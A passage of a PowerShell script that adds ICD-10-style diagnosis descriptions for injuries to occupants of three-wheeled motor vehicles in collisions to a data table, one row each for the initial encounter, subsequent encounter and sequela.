in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Passenger in three-wheeled motor vehicle injured in collision with pedestrian or animal in traffic accident","Passenger in three-wheeled motor vehicle injured in collision with pedestrian or animal in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person on outside of three-wheeled motor vehicle injured in collision with pedestrian or animal in traffic accident","Person on outside of three-wheeled motor vehicle injured in collision with pedestrian or animal in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of three-wheeled motor vehicle injured in collision with pedestrian or animal in traffic accident","Person on outside of three-wheeled motor vehicle injured in collision with pedestrian or animal in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of three-wheeled motor vehicle injured in collision with pedestrian or animal in traffic accident","Person on outside of three-wheeled motor vehicle injured in collision with pedestrian or animal in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of three-wheeled motor vehicle injured in collision with pedestrian or animal in traffic accident","Unspecified occupant of three-wheeled motor vehicle injured in collision with pedestrian or animal in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of three-wheeled motor vehicle injured in collision with pedestrian or animal in traffic accident","Unspecified occupant of three-wheeled motor vehicle injured in collision with pedestrian or animal in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of three-wheeled motor vehicle injured in collision with pedestrian or animal in traffic accident","Unspecified occupant of three-wheeled motor vehicle injured in collision with pedestrian or animal in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Driver of three-wheeled motor vehicle injured in collision with pedal cycle in nontraffic accident","Driver of three-wheeled motor vehicle injured in collision with pedal cycle in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Driver of three-wheeled motor vehicle injured in collision with pedal cycle in nontraffic accident","Driver of three-wheeled motor vehicle injured in collision with pedal cycle in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Driver of three-wheeled motor vehicle injured in collision with pedal cycle in nontraffic accident","Driver of three-wheeled motor vehicle injured in collision with pedal cycle in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Passenger in three-wheeled motor vehicle injured in collision with pedal cycle in nontraffic accident","Passenger in three-wheeled motor vehicle injured in collision with pedal cycle in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Passenger in three-wheeled motor vehicle injured in collision with pedal cycle in nontraffic accident","Passenger in three-wheeled motor vehicle injured in collision with pedal cycle in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Passenger in three-wheeled motor vehicle injured in collision with pedal cycle in nontraffic accident","Passenger in three-wheeled motor vehicle injured in collision with pedal cycle in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person on outside of three-wheeled motor vehicle injured in collision with pedal cycle in nontraffic accident","Person on outside of three-wheeled motor vehicle injured in collision with pedal cycle in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of three-wheeled motor vehicle injured in collision with pedal cycle in nontraffic accident","Person on outside of three-wheeled motor vehicle injured in collision with pedal cycle in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of three-wheeled motor vehicle injured in collision with pedal cycle in nontraffic accident","Person on outside of three-wheeled motor vehicle injured in collision with pedal cycle in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of three-wheeled motor vehicle injured in collision with pedal cycle in nontraffic accident","Unspecified occupant of three-wheeled motor vehicle injured in collision with pedal cycle in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of three-wheeled motor vehicle injured in collision with pedal cycle in nontraffic accident","Unspecified occupant of three-wheeled motor vehicle injured in collision with pedal cycle in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of three-wheeled motor vehicle injured in collision with pedal cycle in nontraffic accident","Unspecified occupant of three-wheeled motor vehicle injured in collision with pedal cycle in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a three-wheeled motor vehicle injured in collision with pedal cycle","Person boarding or alighting a three-wheeled motor vehicle injured in collision with pedal cycle, initial encounter") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a three-wheeled motor vehicle injured in collision with pedal cycle","Person boarding or alighting a three-wheeled motor vehicle injured in collision with pedal cycle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a three-wheeled motor vehicle injured in collision with pedal cycle","Person boarding or alighting a three-wheeled motor vehicle injured in collision with pedal cycle, sequela") + $null = $DiagnosisList.Rows.Add("Driver of three-wheeled motor vehicle injured in collision with pedal cycle in traffic accident","Driver of three-wheeled motor vehicle injured in collision with pedal cycle in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Driver of three-wheeled motor vehicle injured in collision with pedal cycle in traffic accident","Driver of three-wheeled motor vehicle injured in collision with pedal cycle in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Driver of three-wheeled motor vehicle injured in collision with pedal cycle in traffic accident","Driver of three-wheeled motor vehicle injured in collision with pedal cycle in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Passenger in three-wheeled motor vehicle injured in collision with pedal cycle in traffic accident","Passenger in three-wheeled motor vehicle injured in collision with pedal cycle in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Passenger in three-wheeled motor vehicle injured in collision with pedal cycle in traffic accident","Passenger in three-wheeled motor vehicle injured in collision with pedal cycle in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Passenger in three-wheeled motor vehicle injured in collision with pedal cycle in traffic accident","Passenger in three-wheeled motor vehicle injured in collision with pedal cycle in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person on outside of three-wheeled motor vehicle injured in collision with pedal cycle in traffic accident","Person on outside of three-wheeled motor vehicle injured in collision with pedal cycle in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of three-wheeled motor vehicle injured in collision with pedal cycle in traffic accident","Person on outside of three-wheeled motor vehicle injured in collision with pedal cycle in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of three-wheeled motor vehicle injured in collision with pedal cycle in traffic accident","Person on outside of three-wheeled motor vehicle injured in collision with pedal cycle in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of three-wheeled motor vehicle injured in collision with pedal cycle in traffic accident","Unspecified occupant of three-wheeled motor vehicle injured in collision with pedal cycle in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of three-wheeled motor vehicle injured in collision with pedal cycle in traffic accident","Unspecified occupant of three-wheeled motor vehicle injured in collision with pedal cycle in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of three-wheeled motor vehicle injured in collision with pedal cycle in traffic accident","Unspecified occupant of three-wheeled motor vehicle injured in collision with pedal cycle in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Driver of three-wheeled motor vehicle injured in collision with two- or three-wheeled motor vehicle in nontraffic accident","Driver of three-wheeled motor vehicle injured in collision with two- or three-wheeled motor vehicle in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Driver of three-wheeled motor vehicle injured in collision with two- or three-wheeled motor vehicle in nontraffic accident","Driver of three-wheeled motor vehicle injured in collision with two- or three-wheeled motor vehicle in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Driver of three-wheeled motor vehicle injured in collision with two- or three-wheeled motor vehicle in nontraffic accident","Driver of three-wheeled motor vehicle injured in collision with two- or three-wheeled motor vehicle in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Passenger in three-wheeled motor vehicle injured in collision with two- or three-wheeled motor vehicle in nontraffic accident","Passenger in three-wheeled motor vehicle injured in collision with two- or three-wheeled motor vehicle in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Passenger in three-wheeled motor vehicle injured in collision with two- or three-wheeled motor vehicle in nontraffic accident","Passenger in three-wheeled motor vehicle injured in collision with two- or three-wheeled motor vehicle in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Passenger in three-wheeled motor vehicle injured in collision with two- or three-wheeled motor vehicle in nontraffic accident","Passenger in three-wheeled motor vehicle injured in collision with two- or three-wheeled motor vehicle in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person on outside of three-wheeled motor vehicle injured in collision with two- or three-wheeled motor vehicle in nontraffic accident","Person on outside of three-wheeled motor vehicle injured in collision with two- or three-wheeled motor vehicle in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of three-wheeled motor vehicle injured in collision with two- or three-wheeled motor vehicle in nontraffic accident","Person on outside of three-wheeled motor vehicle injured in collision with two- or three-wheeled motor vehicle in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of three-wheeled motor vehicle injured in collision with two- or three-wheeled motor vehicle in nontraffic accident","Person on outside of three-wheeled motor vehicle injured in collision with two- or three-wheeled motor vehicle in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of three-wheeled motor vehicle injured in collision with two- or three-wheeled motor vehicle in nontraffic accident","Unspecified occupant of three-wheeled motor vehicle injured in collision with two- or three-wheeled motor vehicle in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of three-wheeled motor vehicle injured in collision with two- or three-wheeled motor vehicle in nontraffic accident","Unspecified occupant of three-wheeled motor vehicle injured in collision with two- or three-wheeled motor vehicle in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of three-wheeled motor vehicle injured in collision with two- or three-wheeled motor vehicle in nontraffic accident","Unspecified occupant of three-wheeled motor vehicle injured in collision with two- or three-wheeled motor vehicle in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a three-wheeled motor vehicle injured in collision with two- or three-wheeled motor vehicle","Person boarding or alighting a three-wheeled motor vehicle injured in collision with two- or three-wheeled motor vehicle, initial encounter") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a three-wheeled motor vehicle injured in collision with two- or three-wheeled motor vehicle","Person boarding or alighting a three-wheeled motor vehicle injured in collision with two- or three-wheeled motor vehicle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a three-wheeled motor vehicle injured in collision with two- or three-wheeled motor vehicle","Person boarding or alighting a three-wheeled motor vehicle injured in collision with two- or three-wheeled motor vehicle, sequela") + $null = $DiagnosisList.Rows.Add("Driver of three-wheeled motor vehicle injured in collision with two- or three-wheeled motor vehicle in traffic accident","Driver of three-wheeled motor vehicle injured in collision with two- or three-wheeled motor vehicle in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Driver of three-wheeled motor vehicle injured in collision with two- or three-wheeled motor vehicle in traffic accident","Driver of three-wheeled motor vehicle injured in collision with two- or three-wheeled motor vehicle in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Driver of three-wheeled motor vehicle injured in collision with two- or three-wheeled motor vehicle in traffic accident","Driver of three-wheeled motor vehicle injured in collision with two- or three-wheeled motor vehicle in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Passenger in three-wheeled motor vehicle injured in collision with two- or three-wheeled motor vehicle in traffic accident","Passenger in three-wheeled motor vehicle injured in collision with two- or three-wheeled motor vehicle in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Passenger in three-wheeled motor vehicle injured in collision with two- or three-wheeled motor vehicle in traffic accident","Passenger in three-wheeled motor vehicle injured in collision with two- or three-wheeled motor vehicle in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Passenger in three-wheeled motor vehicle injured in collision with two- or three-wheeled motor vehicle in traffic accident","Passenger in three-wheeled motor vehicle injured in collision with two- or three-wheeled motor vehicle in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person on outside of three-wheeled motor vehicle injured in collision with two- or three-wheeled motor vehicle in traffic accident","Person on outside of three-wheeled motor vehicle injured in collision with two- or three-wheeled motor vehicle in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of three-wheeled motor vehicle injured in collision with two- or three-wheeled motor vehicle in traffic accident","Person on outside of three-wheeled motor vehicle injured in collision with two- or three-wheeled motor vehicle in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of three-wheeled motor vehicle injured in collision with two- or three-wheeled motor vehicle in traffic accident","Person on outside of three-wheeled motor vehicle injured in collision with two- or three-wheeled motor vehicle in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of three-wheeled motor vehicle injured in collision with two- or three-wheeled motor vehicle in traffic accident","Unspecified occupant of three-wheeled motor vehicle injured in collision with two- or three-wheeled motor vehicle in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of three-wheeled motor vehicle injured in collision with two- or three-wheeled motor vehicle in traffic accident","Unspecified occupant of three-wheeled motor vehicle injured in collision with two- or three-wheeled motor vehicle in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of three-wheeled motor vehicle injured in collision with two- or three-wheeled motor vehicle in traffic accident","Unspecified occupant of three-wheeled motor vehicle injured in collision with two- or three-wheeled motor vehicle in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Driver of three-wheeled motor vehicle injured in collision with car, pick-up truck or van in nontraffic accident","Driver of three-wheeled motor vehicle injured in collision with car, pick-up truck or van in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Driver of three-wheeled motor vehicle injured in collision with car, pick-up truck or van in nontraffic accident","Driver of three-wheeled motor vehicle injured in collision with car, pick-up truck or van in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Driver of three-wheeled motor vehicle injured in collision with car, pick-up truck or van in nontraffic accident","Driver of three-wheeled motor vehicle injured in collision with car, pick-up truck or van in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Passenger in three-wheeled motor vehicle injured in collision with car, pick-up truck or van in nontraffic accident","Passenger in three-wheeled motor vehicle injured in collision with car, pick-up truck or van in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Passenger in three-wheeled motor vehicle injured in collision with car, pick-up truck or van in nontraffic accident","Passenger in three-wheeled motor vehicle injured in collision with car, pick-up truck or van in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Passenger in three-wheeled motor vehicle injured in collision with car, pick-up truck or van in nontraffic accident","Passenger in three-wheeled motor vehicle injured in collision with car, pick-up truck or van in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person on outside of three-wheeled motor vehicle injured in collision with car, pick-up truck or van in nontraffic accident","Person on outside of three-wheeled motor vehicle injured in collision with car, pick-up truck or van in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of three-wheeled motor vehicle injured in collision with car, pick-up truck or van in nontraffic accident","Person on outside of three-wheeled motor vehicle injured in collision with car, pick-up truck or van in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of three-wheeled motor vehicle injured in collision with car, pick-up truck or van in nontraffic accident","Person on outside of three-wheeled motor vehicle injured in collision with car, pick-up truck or van in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of three-wheeled motor vehicle injured in collision with car, pick-up truck or van in nontraffic accident","Unspecified occupant of three-wheeled motor vehicle injured in collision with car, pick-up truck or van in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of three-wheeled motor vehicle injured in collision with car, pick-up truck or van in nontraffic accident","Unspecified occupant of three-wheeled motor vehicle injured in collision with car, pick-up truck or van in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of three-wheeled motor vehicle injured in collision with car, pick-up truck or van in nontraffic accident","Unspecified occupant of three-wheeled motor vehicle injured in collision with car, pick-up truck or van in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a three-wheeled motor vehicle injured in collision with car, pick-up truck or van","Person boarding or alighting a three-wheeled motor vehicle injured in collision with car, pick-up truck or van, initial encounter") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a three-wheeled motor vehicle injured in collision with car, pick-up truck or van","Person boarding or alighting a three-wheeled motor vehicle injured in collision with car, pick-up truck or van, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a three-wheeled motor vehicle injured in collision with car, pick-up truck or van","Person boarding or alighting a three-wheeled motor vehicle injured in collision with car, pick-up truck or van, sequela") + $null = $DiagnosisList.Rows.Add("Driver of three-wheeled motor vehicle injured in collision with car, pick-up truck or van in traffic accident","Driver of three-wheeled motor vehicle injured in collision with car, pick-up truck or van in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Driver of three-wheeled motor vehicle injured in collision with car, pick-up truck or van in traffic accident","Driver of three-wheeled motor vehicle injured in collision with car, pick-up truck or van in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Driver of three-wheeled motor vehicle injured in collision with car, pick-up truck or van in traffic accident","Driver of three-wheeled motor vehicle injured in collision with car, pick-up truck or van in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Passenger in three-wheeled motor vehicle injured in collision with car, pick-up truck or van in traffic accident","Passenger in three-wheeled motor vehicle injured in collision with car, pick-up truck or van in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Passenger in three-wheeled motor vehicle injured in collision with car, pick-up truck or van in traffic accident","Passenger in three-wheeled motor vehicle injured in collision with car, pick-up truck or van in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Passenger in three-wheeled motor vehicle injured in collision with car, pick-up truck or van in traffic accident","Passenger in three-wheeled motor vehicle injured in collision with car, pick-up truck or van in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person on outside of three-wheeled motor vehicle injured in collision with car, pick-up truck or van in traffic accident","Person on outside of three-wheeled motor vehicle injured in collision with car, pick-up truck or van in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of three-wheeled motor vehicle injured in collision with car, pick-up truck or van in traffic accident","Person on outside of three-wheeled motor vehicle injured in collision with car, pick-up truck or van in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of three-wheeled motor vehicle injured in collision with car, pick-up truck or van in traffic accident","Person on outside of three-wheeled motor vehicle injured in collision with car, pick-up truck or van in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of three-wheeled motor vehicle injured in collision with car, pick-up truck or van in traffic accident","Unspecified occupant of three-wheeled motor vehicle injured in collision with car, pick-up truck or van in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of three-wheeled motor vehicle injured in collision with car, pick-up truck or van in traffic accident","Unspecified occupant of three-wheeled motor vehicle injured in collision with car, pick-up truck or van in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of three-wheeled motor vehicle injured in collision with car, pick-up truck or van in traffic accident","Unspecified occupant of three-wheeled motor vehicle injured in collision with car, pick-up truck or van in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Driver of three-wheeled motor vehicle injured in collision with heavy transport vehicle or bus in nontraffic accident","Driver of three-wheeled motor vehicle injured in collision with heavy transport vehicle or bus in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Driver of three-wheeled motor vehicle injured in collision with heavy transport vehicle or bus in nontraffic accident","Driver of three-wheeled motor vehicle injured in collision with heavy transport vehicle or bus in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Driver of three-wheeled motor vehicle injured in collision with heavy transport vehicle or bus in nontraffic accident","Driver of three-wheeled motor vehicle injured in collision with heavy transport vehicle or bus in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Passenger in three-wheeled motor vehicle injured in collision with heavy transport vehicle or bus in nontraffic accident","Passenger in three-wheeled motor vehicle injured in collision with heavy transport vehicle or bus in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Passenger in three-wheeled motor vehicle injured in collision with heavy transport vehicle or bus in nontraffic accident","Passenger in three-wheeled motor vehicle injured in collision with heavy transport vehicle or bus in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Passenger in three-wheeled motor vehicle injured in collision with heavy transport vehicle or bus in nontraffic accident","Passenger in three-wheeled motor vehicle injured in collision with heavy transport vehicle or bus in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person on outside of three-wheeled motor vehicle injured in collision with heavy transport vehicle or bus in nontraffic accident","Person on outside of three-wheeled motor vehicle injured in collision with heavy transport vehicle or bus in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of three-wheeled motor vehicle injured in collision with heavy transport vehicle or bus in nontraffic accident","Person on outside of three-wheeled motor vehicle injured in collision with heavy transport vehicle or bus in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of three-wheeled motor vehicle injured in collision with heavy transport vehicle or bus in nontraffic accident","Person on outside of three-wheeled motor vehicle injured in collision with heavy transport vehicle or bus in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of three-wheeled motor vehicle injured in collision with heavy transport vehicle or bus in nontraffic accident","Unspecified occupant of three-wheeled motor vehicle injured in collision with heavy transport vehicle or bus in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of three-wheeled motor vehicle injured in collision with heavy transport vehicle or bus in nontraffic accident","Unspecified occupant of three-wheeled motor vehicle injured in collision with heavy transport vehicle or bus in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of three-wheeled motor vehicle injured in collision with heavy transport vehicle or bus in nontraffic accident","Unspecified occupant of three-wheeled motor vehicle injured in collision with heavy transport vehicle or bus in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a three-wheeled motor vehicle injured in collision with heavy transport vehicle or bus","Person boarding or alighting a three-wheeled motor vehicle injured in collision with heavy transport vehicle or bus, initial encounter") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a three-wheeled motor vehicle injured in collision with heavy transport vehicle or bus","Person boarding or alighting a three-wheeled motor vehicle injured in collision with heavy transport vehicle or bus, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a three-wheeled motor vehicle injured in collision with heavy transport vehicle or bus","Person boarding or alighting a three-wheeled motor vehicle injured in collision with heavy transport vehicle or bus, sequela") + $null = $DiagnosisList.Rows.Add("Driver of three-wheeled motor vehicle injured in collision with heavy transport vehicle or bus in traffic accident","Driver of three-wheeled motor vehicle injured in collision with heavy transport vehicle or bus in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Driver of three-wheeled motor vehicle injured in collision with heavy transport vehicle or bus in traffic accident","Driver of three-wheeled motor vehicle injured in collision with heavy transport vehicle or bus in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Driver of three-wheeled motor vehicle injured in collision with heavy transport vehicle or bus in traffic accident","Driver of three-wheeled motor vehicle injured in collision with heavy transport vehicle or bus in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Passenger in three-wheeled motor vehicle injured in collision with heavy transport vehicle or bus in traffic accident","Passenger in three-wheeled motor vehicle injured in collision with heavy transport vehicle or bus in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Passenger in three-wheeled motor vehicle injured in collision with heavy transport vehicle or bus in traffic accident","Passenger in three-wheeled motor vehicle injured in collision with heavy transport vehicle or bus in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Passenger in three-wheeled motor vehicle injured in collision with heavy transport vehicle or bus in traffic accident","Passenger in three-wheeled motor vehicle injured in collision with heavy transport vehicle or bus in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person on outside of three-wheeled motor vehicle injured in collision with heavy transport vehicle or bus in traffic accident","Person on outside of three-wheeled motor vehicle injured in collision with heavy transport vehicle or bus in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of three-wheeled motor vehicle injured in collision with heavy transport vehicle or bus in traffic accident","Person on outside of three-wheeled motor vehicle injured in collision with heavy transport vehicle or bus in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of three-wheeled motor vehicle injured in collision with heavy transport vehicle or bus in traffic accident","Person on outside of three-wheeled motor vehicle injured in collision with heavy transport vehicle or bus in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of three-wheeled motor vehicle injured in collision with heavy transport vehicle or bus in traffic accident","Unspecified occupant of three-wheeled motor vehicle injured in collision with heavy transport vehicle or bus in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of three-wheeled motor vehicle injured in collision with heavy transport vehicle or bus in traffic accident","Unspecified occupant of three-wheeled motor vehicle injured in collision with heavy transport vehicle or bus in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of three-wheeled motor vehicle injured in collision with heavy transport vehicle or bus in traffic accident","Unspecified occupant of three-wheeled motor vehicle injured in collision with heavy transport vehicle or bus in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Driver of three-wheeled motor vehicle injured in collision with railway train or railway vehicle in nontraffic accident","Driver of three-wheeled motor vehicle injured in collision with railway train or railway vehicle in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Driver of three-wheeled motor vehicle injured in collision with railway train or railway vehicle in nontraffic accident","Driver of three-wheeled motor vehicle injured in collision with railway train or railway vehicle in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Driver of three-wheeled motor vehicle injured in collision with railway train or railway vehicle in nontraffic accident","Driver of three-wheeled motor vehicle injured in collision with railway train or railway vehicle in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Passenger in three-wheeled motor vehicle injured in collision with railway train or railway vehicle in nontraffic accident","Passenger in three-wheeled motor vehicle injured in collision with railway train or railway vehicle in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Passenger in three-wheeled motor vehicle injured in collision with railway train or railway vehicle in nontraffic accident","Passenger in three-wheeled motor vehicle injured in collision with railway train or railway vehicle in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Passenger in three-wheeled motor vehicle injured in collision with railway train or railway vehicle in nontraffic accident","Passenger in three-wheeled motor vehicle injured in collision with railway train or railway vehicle in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person on outside of three-wheeled motor vehicle injured in collision with railway train or railway vehicle in nontraffic accident","Person on outside of three-wheeled motor vehicle injured in collision with railway train or railway vehicle in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of three-wheeled motor vehicle injured in collision with railway train or railway vehicle in nontraffic accident","Person on outside of three-wheeled motor vehicle injured in collision with railway train or railway vehicle in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of three-wheeled motor vehicle injured in collision with railway train or railway vehicle in nontraffic accident","Person on outside of three-wheeled motor vehicle injured in collision with railway train or railway vehicle in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of three-wheeled motor vehicle injured in collision with railway train or railway vehicle in nontraffic accident","Unspecified occupant of three-wheeled motor vehicle injured in collision with railway train or railway vehicle in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of three-wheeled motor vehicle injured in collision with railway train or railway vehicle in nontraffic accident","Unspecified occupant of three-wheeled motor vehicle injured in collision with railway train or railway vehicle in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of three-wheeled motor vehicle injured in collision with railway train or railway vehicle in nontraffic accident","Unspecified occupant of three-wheeled motor vehicle injured in collision with railway train or railway vehicle in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a three-wheeled motor vehicle injured in collision with railway train or railway vehicle","Person boarding or alighting a three-wheeled motor vehicle injured in collision with railway train or railway vehicle, initial encounter") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a three-wheeled motor vehicle injured in collision with railway train or railway vehicle","Person boarding or alighting a three-wheeled motor vehicle injured in collision with railway train or railway vehicle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a three-wheeled motor vehicle injured in collision with railway train or railway vehicle","Person boarding or alighting a three-wheeled motor vehicle injured in collision with railway train or railway vehicle, sequela") + $null = $DiagnosisList.Rows.Add("Driver of three-wheeled motor vehicle injured in collision with railway train or railway vehicle in traffic accident","Driver of three-wheeled motor vehicle injured in collision with railway train or railway vehicle in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Driver of three-wheeled motor vehicle injured in collision with railway train or railway vehicle in traffic accident","Driver of three-wheeled motor vehicle injured in collision with railway train or railway vehicle in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Driver of three-wheeled motor vehicle injured in collision with railway train or railway vehicle in traffic accident","Driver of three-wheeled motor vehicle injured in collision with railway train or railway vehicle in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Passenger in three-wheeled motor vehicle injured in collision with railway train or railway vehicle in traffic accident","Passenger in three-wheeled motor vehicle injured in collision with railway train or railway vehicle in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Passenger in three-wheeled motor vehicle injured in collision with railway train or railway vehicle in traffic accident","Passenger in three-wheeled motor vehicle injured in collision with railway train or railway vehicle in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Passenger in three-wheeled motor vehicle injured in collision with railway train or railway vehicle in traffic accident","Passenger in three-wheeled motor vehicle injured in collision with railway train or railway 